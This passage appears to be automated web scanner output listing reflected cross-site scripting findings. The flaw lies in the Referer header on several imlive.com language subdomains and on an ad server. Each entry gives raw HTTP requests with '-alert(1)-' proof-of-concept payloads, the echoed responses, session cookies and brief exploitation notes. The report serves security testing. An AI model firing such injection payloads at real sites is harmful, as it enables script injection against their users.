<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=de.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=e6236'-alert(1)-'6b063b5f82a&iu=1&vd=4e0a90f8-4f17-4e29-82a0-f518b35446a3';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typeof obj.addEvent
...[SNIP]...

4.924. http://de.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://de.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e45d9'-alert(1)-'4b50bf8581f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: de.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e45d9'-alert(1)-'4b50bf8581f

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=go54xq451damzdiseidhmr55; path=/; HttpOnly
Set-Cookie: pde=; expires=Thu, 27-Jan-2011 14:17:05 GMT; path=/
Set-Cookie: spvdr=vd=07626285-c0ff-437f-958c-dcbbd088dd7f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:05 GMT; path=/
Set-Cookie: ide=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:05 GMT
Connection: close
Content-Length: 169257
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=de.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=e45d9'-alert(1)-'4b50bf8581f&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=07626285-c0ff-437f-958c-dcbbd088dd7f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.925. http://dk.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c15d'-alert(1)-'545d614c845 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8c15d'-alert(1)-'545d614c845

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mw4rtt55tfb3b345unpsg3bl; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:09 GMT; path=/
Set-Cookie: spvdr=vd=6f35da7a-dc76-47e3-98a4-e43628726799&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 17947
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8c15d'-alert(1)-'545d614c845&iy=dallas&id=44&iu=1&vd=6f35da7a-dc76-47e3-98a4-e43628726799';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.926. http://dk.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dk.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ec0'-alert(1)-'1ca19f61f52 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=58ec0'-alert(1)-'1ca19f61f52

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3art1xq5rk2h0l45whar1iir; path=/; HttpOnly
Set-Cookie: pdk=; expires=Thu, 27-Jan-2011 14:17:14 GMT; path=/
Set-Cookie: spvdr=vd=76cd456c-f3e0-433a-8774-56766a677704&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:14 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:13 GMT
Connection: close
Content-Length: 220246
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=dk.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=58ec0'-alert(1)-'1ca19f61f52&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=76cd456c-f3e0-433a-8774-56766a677704';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.927. http://es.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ef76'-alert(1)-'7097e4ccd25 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6ef76'-alert(1)-'7097e4ccd25

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: ASP.NET_SessionId=zuzkb455ihqfoc55yv0wku45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:11 GMT; path=/
Set-Cookie: spvdr=vd=2550678d-c9a3-476d-862b-ab4b8888cd75&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:11 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:10 GMT
Connection: close
Content-Length: 18390
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=6ef76'-alert(1)-'7097e4ccd25&iy=dallas&id=44&iu=1&vd=2550678d-c9a3-476d-862b-ab4b8888cd75';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.928. http://es.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://es.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751a4'-alert(1)-'3e6a4981811 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=751a4'-alert(1)-'3e6a4981811

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ly2txpzezmcm5155sslifc45; path=/; HttpOnly
Set-Cookie: pes=; expires=Thu, 27-Jan-2011 14:17:19 GMT; path=/
Set-Cookie: spvdr=vd=ff1efd09-20e4-4d52-8133-071e0b292933&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 211707
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/hostlist.ashx&he=es.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=751a4'-alert(1)-'3e6a4981811&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=ff1efd09-20e4-4d52-8133-071e0b292933';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.929. http://fr.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8655a'-alert(1)-'b1450d4e902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=8655a'-alert(1)-'b1450d4e902

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=n3rd2q45ehprj445d1b53wnr; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:20 GMT; path=/
Set-Cookie: spvdr=vd=66658cff-7513-44e5-b0ab-43cb696f464f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:20 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:20 GMT
Connection: close
Content-Length: 18603
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=8655a'-alert(1)-'b1450d4e902&iy=dallas&id=44&iu=1&vd=66658cff-7513-44e5-b0ab-43cb696f464f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.930. http://fr.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82729'-alert(1)-'0751f493bff was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=82729'-alert(1)-'0751f493bff

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=h1mmxpmwhy5mtf45pdkrf0bs; path=/; HttpOnly
Set-Cookie: pfr=; expires=Thu, 27-Jan-2011 14:17:25 GMT; path=/
Set-Cookie: spvdr=vd=a562a319-9a57-49cf-9551-42caa14fd03b&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:25 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 21030
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/login.aspx&he=fr.imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=82729'-alert(1)-'0751f493bff&iy=dallas&id=44&iu=1&vd=a562a319-9a57-49cf-9551-42caa14fd03b';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.931. http://gr.imlive.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28ad3'-alert(1)-'7c8c16b05d7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=28ad3'-alert(1)-'7c8c16b05d7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rd0er4vsfoczxdmbrfuaqi55; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:24 GMT; path=/
Set-Cookie: spvdr=vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:24 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:24 GMT
Connection: close
Content-Length: 20541
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/&rf=http://www.google.com/search?hl=en^q=28ad3'-alert(1)-'7c8c16b05d7&iy=dallas&id=44&iu=1&vd=5cee6a4d-0187-4b8e-8517-bb8f3cde3c02';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attachEvent( "on" + evt, fn );}else if (typ
...[SNIP]...

4.932. http://gr.imlive.com/waccess/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/waccess/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81a10'-alert(1)-'0b760eb3fe0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /waccess/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=81a10'-alert(1)-'0b760eb3fe0

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=2zgid3yqvmew5czs5zzlfbfr; path=/; HttpOnly
Set-Cookie: pgr=; expires=Thu, 27-Jan-2011 14:17:30 GMT; path=/
Set-Cookie: spvdr=vd=a0b49277-e905-4eb6-a507-32e282c3c02f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:30 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:30 GMT
Connection: close
Content-Length: 253495
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/hostlist.ashx&he=gr.imlive.com&ul=/live-sex-chats/cam-girls/&rf=http://www.google.com/search?hl=en^q=81a10'-alert(1)-'0b760eb3fe0&qs=cat=1^roomid=10&qs=cat=1^roomid=10&iy=dallas&id=44&iu=1&vd=a0b49277-e905-4eb6-a507-32e282c3c02f';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){obj.attac
...[SNIP]...

4.933. http://ib.adnxs.com/ttj [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ttj

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ec55'-alert(1)-'3deb7da7e95 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=0.14057195745408535 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
